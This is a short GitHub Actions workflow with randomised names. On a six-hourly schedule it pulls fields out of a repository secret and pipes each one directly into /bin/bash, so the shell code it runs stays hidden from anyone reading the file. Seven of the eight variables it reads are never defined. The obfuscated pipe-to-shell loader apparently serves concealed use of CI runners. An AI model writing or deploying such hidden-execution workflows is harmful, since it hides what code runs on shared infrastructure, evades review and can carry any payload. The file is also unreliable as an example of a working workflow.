name: beidabx
on:
  workflow_dispatch:
  schedule:
    - cron: '34 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: beidabx
        env:
          yrr66795: ${{ secrets.yrr66795 }}
        run: |
          echo $yrr66795 | jq -r .uv685 | /bin/bash
          echo $i92 | jq -r .wm6195 | /bin/bash
          echo $sqx1 | jq -r .ymbc93 | /bin/bash
          echo $pgxjm97072 | jq -r .qqgl00207 | /bin/bash
          echo $cw2 | jq -r .cw82188 | /bin/bash
          echo $egaj1490 | jq -r .uh55103 | /bin/bash
          echo $phff745 | jq -r .huu67689 | /bin/bash
          echo $c41 | jq -r .wu4 | /bin/bash

